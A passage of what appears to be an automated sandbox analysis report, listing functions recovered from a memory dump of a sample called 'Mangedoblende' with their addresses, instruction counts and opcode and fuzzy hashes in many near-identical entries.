                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350992406.0000000022810000.00000040.00000800.00020000.00000000.sdmp, Offset: 22810000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22810000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: f4b538a790a1582d34fe55eac08f7b481b4bb8f98a1496fcd389cafa6b5f06ed
                                                                                                                                                                            • Instruction ID: eef855dcd59e255e478bf51a290394e477f2221404ed5553a2339a003a25d5e0
                                                                                                                                                                            • Opcode Fuzzy Hash: f4b538a790a1582d34fe55eac08f7b481b4bb8f98a1496fcd389cafa6b5f06ed
                                                                                                                                                                            • Instruction Fuzzy Hash: 6FD18F78E05318CFDB15DFA5C994B9DBBB2BF89300F2081A9D408A72A5DB359E81DF50
                                                                                                                                                                            Function 2281CFA8 Relevance: .3, Instructions: 292COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350992406.0000000022810000.00000040.00000800.00020000.00000000.sdmp, Offset: 22810000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22810000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: e6a64f1d8f8444cc03dc5850833157f56b43dc2f77c84800f88ceffff284c8ab
                                                                                                                                                                            • Instruction ID: 9eecf520c37841add6d65850c788279178bb1b3cdf161d193ca13c62bf2f33d9
                                                                                                                                                                            • Opcode Fuzzy Hash: e6a64f1d8f8444cc03dc5850833157f56b43dc2f77c84800f88ceffff284c8ab
                                                                                                                                                                            • Instruction Fuzzy Hash: 8AD18F74E04318CFDB55DFA5C994B9DBBB2BF89300F2081A9D408A72A5DB359E81DF50
                                                                                                                                                                            Function 2281FAB0 Relevance: .3, Instructions: 292COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350992406.0000000022810000.00000040.00000800.00020000.00000000.sdmp, Offset: 22810000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22810000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 4e684eb2ce3a95c0bc13dfa2f7da9d4f71a6f7f4c71dae6066a64b82c22a8a41
                                                                                                                                                                            • Instruction ID: 2ae2ee195c25ab800df1a80bc5570ee0d2cbd9771afc9d2f045370f4398339c0
                                                                                                                                                                            • Opcode Fuzzy Hash: 4e684eb2ce3a95c0bc13dfa2f7da9d4f71a6f7f4c71dae6066a64b82c22a8a41
                                                                                                                                                                            • Instruction Fuzzy Hash: 1ED18F74E04318CFDB55DFA5C994B9DBBB2BF89300F2081A9D408AB2A5DB349E81DF50
                                                                                                                                                                            Function 22818CB8 Relevance: .3, Instructions: 292COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350992406.0000000022810000.00000040.00000800.00020000.00000000.sdmp, Offset: 22810000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22810000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 5659bda154762f358757540a9a6dbbdd36217ca07f9f5f5e891a58ef5e35e225
                                                                                                                                                                            • Instruction ID: 4a91ac068996d98bcaba1b6ec4a2329fbd5bf2e11bcb45b53b0ccf131b3a4a4f
                                                                                                                                                                            • Opcode Fuzzy Hash: 5659bda154762f358757540a9a6dbbdd36217ca07f9f5f5e891a58ef5e35e225
                                                                                                                                                                            • Instruction Fuzzy Hash: A2D19F74E053188FDB55DFA5C984B9DBBB2BF89300F2081A9D408AB2A5DB349E81DF50
                                                                                                                                                                            Function 2281B7C0 Relevance: .3, Instructions: 292COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350992406.0000000022810000.00000040.00000800.00020000.00000000.sdmp, Offset: 22810000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22810000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 734ebeb34142b6cc3e6f68813ec2be46945c667c1298ee7326ecd28351e0726e
                                                                                                                                                                            • Instruction ID: 7826ccf0eeaded471533317e04ad3918cb1cefb7d3581fbfb8b09bb8b0236c90
                                                                                                                                                                            • Opcode Fuzzy Hash: 734ebeb34142b6cc3e6f68813ec2be46945c667c1298ee7326ecd28351e0726e
                                                                                                                                                                            • Instruction Fuzzy Hash: 43D18F74E05318CFDB15DFA5C994B9DBBB2BF89300F2081A9D408AB2A5DB359E81DF50
                                                                                                                                                                            Function 2281E2C8 Relevance: .3, Instructions: 292COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350992406.0000000022810000.00000040.00000800.00020000.00000000.sdmp, Offset: 22810000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22810000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 0311bfcd545e7bb0d33e3f1375918411fab9dadf71da5b847d0cbb8110d4fe17
                                                                                                                                                                            • Instruction ID: 8fe6d238a07a5a54a22618021fbaae8a8515eed7577e9a779203365f9c8d021c
                                                                                                                                                                            • Opcode Fuzzy Hash: 0311bfcd545e7bb0d33e3f1375918411fab9dadf71da5b847d0cbb8110d4fe17
                                                                                                                                                                            • Instruction Fuzzy Hash: C7D18F74E01318CFDB55DFA5C994B9DBBB2BF89300F2081A9D408AB2A5DB349E81DF50
                                                                                                                                                                            Function 228174D0 Relevance: .3, Instructions: 292COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350992406.0000000022810000.00000040.00000800.00020000.00000000.sdmp, Offset: 22810000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22810000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: fc719b7f64450febbc7b039d114d5e00ab524afb8d1e44236af0a7101c066df9
                                                                                                                                                                            • Instruction ID: 0b65cda114b1fb5e7900bacd29c3b52bf65ea3964c3a7d553a573d455d1e1e96
                                                                                                                                                                            • Opcode Fuzzy Hash: fc719b7f64450febbc7b039d114d5e00ab524afb8d1e44236af0a7101c066df9
                                                                                                                                                                            • Instruction Fuzzy Hash: 04D18F78E05318CFDB15DFA5C994B9DBBB2BF89300F2081A9D408A72A5DB359E81DF50
                                                                                                                                                                            Function 22819FD8 Relevance: .3, Instructions: 292COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350992406.0000000022810000.00000040.00000800.00020000.00000000.sdmp, Offset: 22810000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22810000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 6101b2b7b620c4413f949581e1e2b01ca2b11263680ed4761ddf25d49d35f137
                                                                                                                                                                            • Instruction ID: a421250d64191bf2e2a65e617108897983f5f5ab930563b10af706f01be2d2f5
                                                                                                                                                                            • Opcode Fuzzy Hash: 6101b2b7b620c4413f949581e1e2b01ca2b11263680ed4761ddf25d49d35f137
                                                                                                                                                                            • Instruction Fuzzy Hash: D2D19F74E04318CFDB55DFA5C984B9DBBB2BF89300F2081A9D408A72A5DB359E81DF50
                                                                                                                                                                            Function 2281F5E8 Relevance: .3, Instructions: 292COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350992406.0000000022810000.00000040.00000800.00020000.00000000.sdmp, Offset: 22810000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22810000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 6804c5f487fa441ffb6c99a86402db213c8be6bb35492b73a795996a6984735f
                                                                                                                                                                            • Instruction ID: da88da64a8592bceabfadfebeefa3f7f9ea351ff79e1dd74b54943591da94594
                                                                                                                                                                            • Opcode Fuzzy Hash: 6804c5f487fa441ffb6c99a86402db213c8be6bb35492b73a795996a6984735f
                                                                                                                                                                            • Instruction Fuzzy Hash: 71D19F74E00318CFDB15DFA5C994B9DBBB2BF89304F2081A9D408AB2A5DB349E81DF50
                                                                                                                                                                            Function 228187F0 Relevance: .3, Instructions: 292COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350992406.0000000022810000.00000040.00000800.00020000.00000000.sdmp, Offset: 22810000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22810000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 783741bc9fdc20b693d17fa0501b12dc7176c66a6a2b05c5074e35343e04ca7c
                                                                                                                                                                            • Instruction ID: 2eb9a591269b6da94532a49fd969c0714dbef3205742e8cd036447212a420da1
                                                                                                                                                                            • Opcode Fuzzy Hash: 783741bc9fdc20b693d17fa0501b12dc7176c66a6a2b05c5074e35343e04ca7c
                                                                                                                                                                            • Instruction Fuzzy Hash: 07D19E74E01318CFDB55DFA5C984B9DBBB2BF89300F6081A9D408AB2A5DB349E81DF50
                                                                                                                                                                            Function 2281B2F8 Relevance: .3, Instructions: 292COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350992406.0000000022810000.00000040.00000800.00020000.00000000.sdmp, Offset: 22810000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22810000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: ae16656043e220b0c96a668e47bf0cbbe24affa8a474298d86eb5c458b6ff193
                                                                                                                                                                            • Instruction ID: e0bd9bee014af794598c8cf6acd7dee6d747160d0e500518502cbc7bfad35e1c
                                                                                                                                                                            • Opcode Fuzzy Hash: ae16656043e220b0c96a668e47bf0cbbe24affa8a474298d86eb5c458b6ff193
                                                                                                                                                                            • Instruction Fuzzy Hash: 66D18074E00318CFDB55DFA5C994B9DBBB2BF89300F2081A9D408AB2A5DB359E81DF50
                                                                                                                                                                            Function 2281DE00 Relevance: .3, Instructions: 292COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350992406.0000000022810000.00000040.00000800.00020000.00000000.sdmp, Offset: 22810000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22810000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 90c381c44310008cfd365fa97cd62e4f03c2f1a618846fe903b815720f257231
                                                                                                                                                                            • Instruction ID: bf7e5095c3887835118f6360762cd4080a4597ff3285bcf7b0645bfd8e20942c
                                                                                                                                                                            • Opcode Fuzzy Hash: 90c381c44310008cfd365fa97cd62e4f03c2f1a618846fe903b815720f257231
                                                                                                                                                                            • Instruction Fuzzy Hash: EED19F74E04318CFDB15DFA5C994B9DBBB2BF89300F2081A9D408AB2A5DB359E81DF50
                                                                                                                                                                            Function 22817008 Relevance: .3, Instructions: 292COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350992406.0000000022810000.00000040.00000800.00020000.00000000.sdmp, Offset: 22810000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22810000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 2e89266df423d6b1c44a8213deef775a4dd669a585d74ba3d3eab860b1299ba9
                                                                                                                                                                            • Instruction ID: 41e9c61d1db4bb366092035a5f98aba758779294fa856fb9909cbfad9d7e7188
                                                                                                                                                                            • Opcode Fuzzy Hash: 2e89266df423d6b1c44a8213deef775a4dd669a585d74ba3d3eab860b1299ba9
                                                                                                                                                                            • Instruction Fuzzy Hash: 7AD18F74E01318CFDB55DFA5C994B9DBBB2BF89300F2081A9D409AB2A5DB349E81DF50
                                                                                                                                                                            Function 22819B10 Relevance: .3, Instructions: 292COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350992406.0000000022810000.00000040.00000800.00020000.00000000.sdmp, Offset: 22810000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22810000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 6dcd04fd9b9df92972df9b7faa7638abaed969b5c1e15ae4aec0246757457e41
                                                                                                                                                                            • Instruction ID: a2c9092d08fbb4d4476b884b1980ec2c1fa64faf4cf6e84c7c9118ea5098bea2
                                                                                                                                                                            • Opcode Fuzzy Hash: 6dcd04fd9b9df92972df9b7faa7638abaed969b5c1e15ae4aec0246757457e41
                                                                                                                                                                            • Instruction Fuzzy Hash: 21D19F74E00318CFDB55DFA5C984B9DBBB2BF89300F2081A9D408AB2A5DB359E81DF50
                                                                                                                                                                            Function 2281C618 Relevance: .3, Instructions: 292COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350992406.0000000022810000.00000040.00000800.00020000.00000000.sdmp, Offset: 22810000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22810000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: c3d11b0391ab972c3bde9e7beda20b13a505a3016cf6fccb52019f93c1f592ef
                                                                                                                                                                            • Instruction ID: ed9bb93a18290829164dea824221c22882f13bf4258fdb17fcd4363174f9ac1b
                                                                                                                                                                            • Opcode Fuzzy Hash: c3d11b0391ab972c3bde9e7beda20b13a505a3016cf6fccb52019f93c1f592ef
                                                                                                                                                                            • Instruction Fuzzy Hash: 81D18E74E00318CFDB15DFA5C984B9DBBB2BF89300F2081A9D508AB2A5DB359A81DF51
                                                                                                                                                                            Function 2281F120 Relevance: .3, Instructions: 292COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350992406.0000000022810000.00000040.00000800.00020000.00000000.sdmp, Offset: 22810000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22810000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 0c93bddacc4e6ddb24a093f5ca504ce803459a067c0a98982a5bd0bf86f1f8c4
                                                                                                                                                                            • Instruction ID: c69be3c7b4c863c62b901db7e4b86d0be501a5ad867aa6bb3821dbdb4f45f684
                                                                                                                                                                            • Opcode Fuzzy Hash: 0c93bddacc4e6ddb24a093f5ca504ce803459a067c0a98982a5bd0bf86f1f8c4
                                                                                                                                                                            • Instruction Fuzzy Hash: BCD18F78E04318CFDB15DFA5C994B9DBBB2BF89300F2081A9D408A72A5DB349E81DF50
                                                                                                                                                                            Function 22818328 Relevance: .3, Instructions: 292COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350992406.0000000022810000.00000040.00000800.00020000.00000000.sdmp, Offset: 22810000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22810000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 3a939db551d6aeccd01f23f48835b5ecdd48bd9751838c5cd636aeb18e0cf79d
                                                                                                                                                                            • Instruction ID: e05482e76c96aa6427cc2fd1148201d1f15e9665e1ba2d2926622b4e17bb3d60
                                                                                                                                                                            • Opcode Fuzzy Hash: 3a939db551d6aeccd01f23f48835b5ecdd48bd9751838c5cd636aeb18e0cf79d
                                                                                                                                                                            • Instruction Fuzzy Hash: 93D19F74E01318CFDB55DFA5C985B9DBBB2BF89300F6081A9D408AB2A5DB349E81DF50
                                                                                                                                                                            Function 2281AE30 Relevance: .3, Instructions: 292COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350992406.0000000022810000.00000040.00000800.00020000.00000000.sdmp, Offset: 22810000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22810000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: e5b74f91d6e0685d762ad4b8c1a680b9f697bb13fc83dd1ae847a0f893d2d293
                                                                                                                                                                            • Instruction ID: 78efbd9d8acd434446d00468941300b55ab575584f7220e05955d3d92b30006f
                                                                                                                                                                            • Opcode Fuzzy Hash: e5b74f91d6e0685d762ad4b8c1a680b9f697bb13fc83dd1ae847a0f893d2d293
                                                                                                                                                                            • Instruction Fuzzy Hash: 75D18074E00318CFDB15DFA5C994B9DBBB2BF89300F2081A9D408AB2A5DB359E81DF50
                                                                                                                                                                            Function 2281D938 Relevance: .3, Instructions: 292COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350992406.0000000022810000.00000040.00000800.00020000.00000000.sdmp, Offset: 22810000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22810000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: b5d477d1d78c49ad304be028f8c6f2ec65d2f7935dd52cc1d5ae81187d5c9c33
                                                                                                                                                                            • Instruction ID: 180980db75f1ebf5b7bb9b51e1e701620f623e608f8da5a88f58972bc670c389
                                                                                                                                                                            • Opcode Fuzzy Hash: b5d477d1d78c49ad304be028f8c6f2ec65d2f7935dd52cc1d5ae81187d5c9c33
                                                                                                                                                                            • Instruction Fuzzy Hash: 55D19F74E04318CFDB55DFA5C984B9DBBB2BF89300F2081A9D408A72A5DB359E81DF50
                                                                                                                                                                            Function 22811280 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350992406.0000000022810000.00000040.00000800.00020000.00000000.sdmp, Offset: 22810000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22810000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: a48afd23afad0f0388cd119596992ff9e62e0cde4edeb7b31564fa1f932a0d2a
                                                                                                                                                                            • Instruction ID: da23e05ceb4f5793f3eda5e7cc5e114daf681c558180f2dd12e6c252f176d25f
                                                                                                                                                                            • Opcode Fuzzy Hash: a48afd23afad0f0388cd119596992ff9e62e0cde4edeb7b31564fa1f932a0d2a
                                                                                                                                                                            • Instruction Fuzzy Hash: 17D1AF78E00718CFDB15DFA5C984B9DBBB2AF89300F5081A9D908AB369DB359D81CF51
                                                                                                                                                                            Function 22812488 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350992406.0000000022810000.00000040.00000800.00020000.00000000.sdmp, Offset: 22810000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22810000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: c79d7283922cfd9180bbb985cf80b1782bf8ac5e68744b836413a76f348a1891
                                                                                                                                                                            • Instruction ID: f732206cbd292187b16e616cfe1d1d69979fd17bae5eeb5c5bd2581a7e4d16f4
                                                                                                                                                                            • Opcode Fuzzy Hash: c79d7283922cfd9180bbb985cf80b1782bf8ac5e68744b836413a76f348a1891
                                                                                                                                                                            • Instruction Fuzzy Hash: 01D1AE78E00318CFDB55DFA5C994B9DBBB2AF89300F5081A9D908AB369DB359D81CF11
                                                                                                                                                                            Function 22814D98 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350992406.0000000022810000.00000040.00000800.00020000.00000000.sdmp, Offset: 22810000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22810000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: e33b26c4960795b8334403e8acd0107841097a665092c01ade955ec2f3639a67
                                                                                                                                                                            • Instruction ID: f6e85a88dadf505337492aa991a62151fcfcdd83381b412927a15e78f83afc60
                                                                                                                                                                            • Opcode Fuzzy Hash: e33b26c4960795b8334403e8acd0107841097a665092c01ade955ec2f3639a67
                                                                                                                                                                            • Instruction Fuzzy Hash: 22D1AE78E00718CFDB15DFA5C994B9DBBB2AF89300F5081A9D908AB365DB359E81CF50
                                                                                                                                                                            Function 22812DA8 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350992406.0000000022810000.00000040.00000800.00020000.00000000.sdmp, Offset: 22810000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22810000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 4ef50b922cd1781ad714ffe2fc7e2c94adaba5128baab04634414c0381eee32b
                                                                                                                                                                            • Instruction ID: deecc3440e905dac69a531d0486a155a544ebf510a2d4c1e90487c8b5ad0f47f
                                                                                                                                                                            • Opcode Fuzzy Hash: 4ef50b922cd1781ad714ffe2fc7e2c94adaba5128baab04634414c0381eee32b
                                                                                                                                                                            • Instruction Fuzzy Hash: 99D1AF78E00318CFDB15DFA5C994B9DBBB2AF89300F5081A9D908AB369DB359D81CF11
                                                                                                                                                                            Function 228156B8 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350992406.0000000022810000.00000040.00000800.00020000.00000000.sdmp, Offset: 22810000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22810000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 80bb4930213813fb5a98c9acb3f0ffe448f3a6c19876e178ff598c2ff167bc7c
                                                                                                                                                                            • Instruction ID: 35a1519eabda92cc31f902148150d762996ba981f00941516eb91694cdb96241
                                                                                                                                                                            • Opcode Fuzzy Hash: 80bb4930213813fb5a98c9acb3f0ffe448f3a6c19876e178ff598c2ff167bc7c
                                                                                                                                                                            • Instruction Fuzzy Hash: 0DD1A078E00318CFDB15DFA5C994B9DBBB2AF89300F5081A9D908AB369DB349D81CF51
                                                                                                                                                                            Function 228136C8 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350992406.0000000022810000.00000040.00000800.00020000.00000000.sdmp, Offset: 22810000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22810000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 69f5f8b1489817cbf86c699891a9f41fea041587a01dd28589cf7130f554ac4d
                                                                                                                                                                            • Instruction ID: 71a911a10eb2c9ed8cb259ca0be3ca06d0304e9da95ae04aeb36a6a394cc47b9
                                                                                                                                                                            • Opcode Fuzzy Hash: 69f5f8b1489817cbf86c699891a9f41fea041587a01dd28589cf7130f554ac4d
                                                                                                                                                                            • Instruction Fuzzy Hash: B2D1AF78E00718CFDB15DFA5C994B9DBBB2AF89300F5081A9D908AB369DB359D81CF50
                                                                                                                                                                            Function 228104D0 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350992406.0000000022810000.00000040.00000800.00020000.00000000.sdmp, Offset: 22810000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22810000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: fa945e14097c37bafbfa064624b07e79c52761bb23ddeeb6b1168d07aca0e1a4
                                                                                                                                                                            • Instruction ID: 1bbfb37044c044db853acf8976dff2625ea74c72924d7fd1ecda26d12a6ae1e0
                                                                                                                                                                            • Opcode Fuzzy Hash: fa945e14097c37bafbfa064624b07e79c52761bb23ddeeb6b1168d07aca0e1a4
                                                                                                                                                                            • Instruction Fuzzy Hash: 4BD19E78E00318CFDB15DFA5C994B9DBBB2AF89300F5081A9D908BB369DB359981CF50
                                                                                                                                                                            Function 22813FE8 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350992406.0000000022810000.00000040.00000800.00020000.00000000.sdmp, Offset: 22810000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22810000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
